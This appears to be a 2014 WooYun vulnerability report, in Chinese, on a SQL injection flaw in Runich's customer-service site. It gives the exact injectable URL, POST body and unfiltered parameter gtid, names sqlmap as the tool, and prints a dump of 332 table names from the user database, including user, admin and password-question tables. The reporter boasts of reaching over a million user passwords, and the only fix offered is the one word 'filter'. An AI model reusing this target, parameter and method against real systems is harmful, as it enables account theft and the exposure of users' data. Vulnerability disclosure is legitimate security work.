2014-05-09:积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-23:厂商已经主动忽略漏洞,细节向公众公开
润趣科技sql注入漏洞,危及百万用户账户安全
详细说明:具体注入点在润趣客服,为post注入漏洞
注入点:
http://kf.runich.com/index.php/Bug/getzones
post数据,
ajax=1>id=11
参数gtid过滤不严,导致注入
请出sqlmap
Database: uc
[332 tables]
+-----------------------------------+
| ccf_user |
| cfill_user |
| clog_user |
| rc_accode |
| rc_accountrate |
| rc_activation |
| rc_activation_item |
| rc_activationlog |
| rc_activationlog_100 |
| rc_activationlog_18 |
| rc_activationlog_29 |
| rc_activationlog_37 |
| rc_activationlog_44 |
| rc_activationlog_45 |
| rc_activationlog_46 |
| rc_activationlog_47 |
| rc_activationlog_48 |
| rc_activationlog_49 |
| rc_activationlog_5 |
| rc_activationlog_50 |
| rc_activationlog_51 |
| rc_activationlog_52 |
| rc_activationlog_54 |
| rc_activationlog_55 |
| rc_activationlog_57 |
| rc_activationlog_58 |
| rc_activationlog_59 |
| rc_activationlog_60 |
| rc_activationlog_61 |
| rc_activationlog_62 |
| rc_activationlog_63 |
| rc_activationlog_64 |
| rc_activationlog_65 |
| rc_activationlog_66 |
| rc_activationlog_67 |
| rc_activationlog_68 |
| rc_activationlog_69 |
| rc_activationlog_70 |
| rc_activationlog_71 |
| rc_activationlog_72 |
| rc_activationlog_73 |
| rc_activationlog_74 |
| rc_activationlog_75 |
| rc_activationlog_76 |
| rc_activationlog_77 |
| rc_activationlog_78 |
| rc_activationlog_79 |
| rc_activationlog_8 |
| rc_activationlog_80 |
| rc_activationlog_81 |
| rc_activationlog_82 |
| rc_activationlog_83 |
| rc_activationlog_84 |
| rc_activationlog_85 |
| rc_activationlog_86 |
| rc_activationlog_87 |
| rc_activationlog_88 |
| rc_activationlog_89 |
| rc_activationlog_90 |
| rc_activationlog_91 |
| rc_activationlog_92 |
| rc_activationlog_93 |
| rc_activationlog_94 |
| rc_activationlog_95 |
| rc_activationlog_96 |
| rc_activationlog_97 |
| rc_activationlog_98 |
| rc_activationlog_99 |
| rc_activefiend |
| rc_activity |
| rc_activity_friend |
| rc_activity_friend_log |
| rc_activity_get_friend |
| rc_activity_integral |
| rc_activity_invitefriend |
| rc_activity_invitefriend_log |
| rc_activity_pw |
| rc_activity_qlzfriend |
| rc_activity_supstar |
| rc_activity_type |
| rc_activity_user |
| rc_activity_video |
| rc_ad_open_count |
| rc_ad_search_list |
| rc_add_item |
| rc_addicted |
| rc_addicted1 |
| rc_admin |
| rc_aduser |
| rc_advertisers |
| rc_agentbar |
| rc_agentbar_user |
| rc_agentbarip |
| rc_agentgroup |
| rc_agentnotice |
| rc_agentuser |
| rc_agentwork |
| rc_anniver_gift_log |
| rc_announce |
| rc_area |
| rc_area_games |
| rc_area_games_novice_card |
| rc_auto_traffic |
| rc_backlog |
| rc_bankcode |
| rc_batchno |
| rc_batchno_user |
| rc_bind_rqb_log |
| rc_bug |
| rc_cafe |
| rc_cafe_list |
| rc_cafemedia |
| rc_cafereg |
| rc_card |
| rc_cardlog |
| rc_cardrate |
| rc_cardtype |
| rc_cdkey_changeitem |
| rc_charcoinlog |
| rc_charge_integral |
| rc_charge_integral_log |
| rc_charge_stats |
| rc_city |
| rc_client_run |
| rc_clientinstall |
| rc_clog |
| rc_clog_merchant |
| rc_clog_temp |
| rc_clog_temp2 |
| rc_clog_temp3 |
| rc_clog_temp4 |
| rc_clog_temp5 |
| rc_clog_temp6 |
| rc_clog_temp7 |
| rc_clog_temp8 |
| rc_coin |
| rc_coin_bak |
| rc_coin_log |
| rc_command_log |
| rc_complaint |
| rc_customer_service_announce |
| rc_customer_service_connect |
| rc_customer_service_group |
| rc_customer_service_question |
| rc_customer_service_question_type |
| rc_customer_service_user |
| rc_deposit_user |
| rc_deposit_user_log |
| rc_dlcount |
| rc_enabled |
| rc_end_world_gitf_two_log |
| rc_exchange |
| rc_exchangeapply |
| rc_fillorder |
| rc_fillorder_user |
| rc_flower_ticket |
| rc_frozencapital |
| rc_game_error |
| rc_gamecard |
| rc_gamecard_old |
| rc_gameintr |
| rc_gamelog |
| rc_gamelogcopy |
| rc_gamepass |
| rc_gametype |
| rc_getfriend_log |
| rc_ggj |
| rc_ggj_tp |
| rc_giftlog |
| rc_giveitem_log |
| rc_good_ask |
| rc_goods |
| rc_goods_change |
| rc_goods_cost_log |
| rc_goods_log |
| rc_gpface |
| rc_greetings_log |
| rc_guest |
| rc_guilds |
| rc_guilduser |
| rc_guilduserinfo |
| rc_happynewyear_log |
| rc_hide_user |
| rc_huanjian_yuyue |
| rc_installpos_ip_log |
| rc_installpos_log |
| rc_integral |
| rc_integral_log |
| rc_integral_store_log |
| rc_integralcard |
| rc_item_bank_log |
| rc_item_cons |
| rc_item_cons_bak |
| rc_item_name |
| rc_itemlog |
| rc_itemsend |
| rc_jiangmin |
| rc_jiazhang |
| rc_kefu_admin |
| rc_lobor_day |
| rc_login_ip_log |
| rc_lottery_log |
| rc_lottery_ticket |
| rc_luckgoods |
| rc_lucklog |
| rc_luckone |
| rc_lucktwo |
| rc_media |
| rc_mengguilx_ip_log |
| rc_mibaocard |
| rc_mobilelog |
| rc_module |
| rc_monthpoints |
| rc_mother_day_log |
| rc_mother_day_user |
| rc_mother_day_user_log |
| rc_national_day |
| rc_new_llx_log |
| rc_new_year_gift_log |
| rc_newbiecard |
| rc_newbiecard_log |
| rc_newbiecard_unlimited |
| rc_newlogrecord |
| rc_old_callback_user_log |
| rc_old_user_callback_log |
| rc_old_user_log |
| rc_online_log |
| rc_panda |
| rc_paycode |
| rc_plog |
| rc_pointcard |
| rc_pointcard_arealist |
| rc_pointcard_bak |
| rc_pointcard_log |
| rc_pointcard_salelist |
| rc_prate |
| rc_prizerate |
| rc_profile |
| rc_promoter |
| rc_promoter_gift |
| rc_promoter_item |
| rc_promoter_item_level |
| rc_promoter_llx |
| rc_promoter_status |
| rc_promoter_youjiang |
| rc_promoteraccount |
| rc_promoteraccount_bak |
| rc_promoters |
| rc_promoters_game |
| rc_promoters_level |
| rc_promoters_leveluser |
| rc_promoters_longtime |
| rc_promoters_point |
| rc_promoters_user |
| rc_province |
| rc_qq_tuan |
| rc_question_zhonglei |
| rc_questionnaire |
| rc_questionnaire_120410 |
| rc_questionnaire_exit |
| rc_questionnaire_uninstall |
| rc_questionnaire_user |
| rc_reamin_coin_log |
| rc_recharge_log |
| rc_register |
| rc_register_code |
| rc_reward_gold_log |
| rc_reward_gold_user |
| rc_role_info |
| rc_role_luck |
| rc_role_luck_log |
| rc_rtime |
| rc_rule |
| rc_rulechild |
| rc_scardlog |
| rc_shenghuoling |
| rc_shop |
| rc_shopclass |
| rc_shoplogs |
| rc_shortmsg_log |
| rc_sign_user |
| rc_spread |
| rc_spreadcode |
| rc_submod |
| rc_supmessage |
| rc_supstar |
| rc_supstar_tp |
| rc_supstar_type |
| rc_the_flot_log |
| rc_track |
| rc_track2 |
| rc_treasure_charge_log |
| rc_treasure_user |
| rc_two_give_log |
| rc_ulogs |
| rc_ulogs_temp1 |
| rc_ulogs_temp2 |
| rc_ulogs_temp3 |
| rc_ulogs_tmp |
| rc_ulogs_tmp2 |
| rc_ulogs_tmp3 |
| rc_ulogs_tmp4 |
| rc_ulogs_tmp5 |
| rc_user |
| rc_user_charge_discount |
| rc_user_charge_gold |
| rc_user_game_question |
| rc_user_merchant |
| rc_user_password_question |
| rc_usergroup |
| rc_userlist |
| rc_userrule |
| rc_valentine_log |
| rc_video |
| rc_video_tp |
| rc_video_type |
| rc_vip |
| rc_vip_admin |
| rc_vip_channel |
| rc_warninguser |
| rc_wlmj_jihuo_log |
| rc_zone |
| rc_zone_info |
| rc_zone_server |
| sheet1 |
| track_11561 |
| track_1164 |
| track_6994 |
| track_7284 |
| user_fillorder_rqb |
| userlist |
| wg_ad_media |
+-----------------------------------+
一百多万用户密码啊!
如上
修复方案:过滤
版权声明:转载请注明来源 bitcoin@乌云 漏洞回应 厂商回应:未能联系到厂商或者厂商积极拒绝